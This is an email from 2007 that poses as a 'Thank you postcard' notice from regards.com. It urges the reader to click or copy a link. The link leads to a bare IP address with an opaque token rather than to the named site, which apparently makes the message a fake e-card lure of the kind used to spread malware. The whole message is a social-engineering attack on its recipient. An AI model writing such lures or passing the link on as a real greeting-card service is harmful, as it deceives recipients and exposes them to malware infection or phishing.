Subject: Thank you postcard

From: <[email-masked]>
Date: Mon, 13 Aug 2007 00:11:32 +0100

Worshipper([email-masked]) has created Thank you postcard for you 
at regards.com.

To see your custom Thank you postcard, simply click on the following 
Internet address (if your mail program doesn't support this feature 
you will need to COPY and PASTE the address into your browser's address box):

http://69.150.94.206/?10f14c1b15b2c2d9b28539b3ac0e3

Send a FREE greeting card from regards.com whenever you want by visiting us at:
http://regards.com/
This service is provided and hosted by regards.com.